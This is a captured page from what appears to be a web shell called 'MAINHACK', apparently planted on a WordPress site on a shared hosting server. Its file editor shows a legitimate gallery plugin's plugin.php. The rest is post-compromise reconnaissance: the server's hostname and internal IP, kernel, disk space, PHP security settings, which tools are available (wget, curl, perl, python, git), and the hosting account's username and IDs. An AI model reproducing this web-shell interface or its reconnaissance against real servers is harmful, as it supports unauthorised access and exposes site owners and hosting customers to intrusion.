[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: plugin.php
<?php /* Plugin Name: Gallery Manager Lite Plugin URI: https://dennishoppe.de/en/wordpress-plugins/gallery-manager Description: This awesome Gallery Manager enables you to create and manage image galleries easily. Furthermore it associates linked images in posts and pages with a nice and responsive touch-enabled lightbox. Version: 1.6.43 Author: Dennis Hoppe Author URI: https://DennisHoppe.de */ if (Version_Compare(PHP_VERSION, '5.5.2', '<')){ die(sprintf('Your PHP version (%s) is far too old. <a href="https://secure.php.net/supported-versions.php" target="_blank">Please upgrade immediately.</a> Then activate the plugin again.', PHP_VERSION)); } $includeFiles = function($pattern){ $arr_files = glob($pattern); if (is_Array($arr_files)){ foreach ($arr_files as $include_file){ include_once $include_file; } } }; # Load core classes $includeFiles(__DIR__ . '/classes/*.php'); $includeFiles(__DIR__ . '/widgets/*.php'); # Inititalize Plugin WordPress\Plugin\GalleryManager\Core::init(__FILE__);
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm021.cluster127.gra.hosting.ovh.net
Server IP: 10.127.20.21
PHP Version: 8.4.22
Server Software: Apache
System: Linux webm021.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: vcomplcotr
User ID (UID): 38697
Group ID (GID): 100
Script Owner UID: 38697
Current Dir Owner: 38697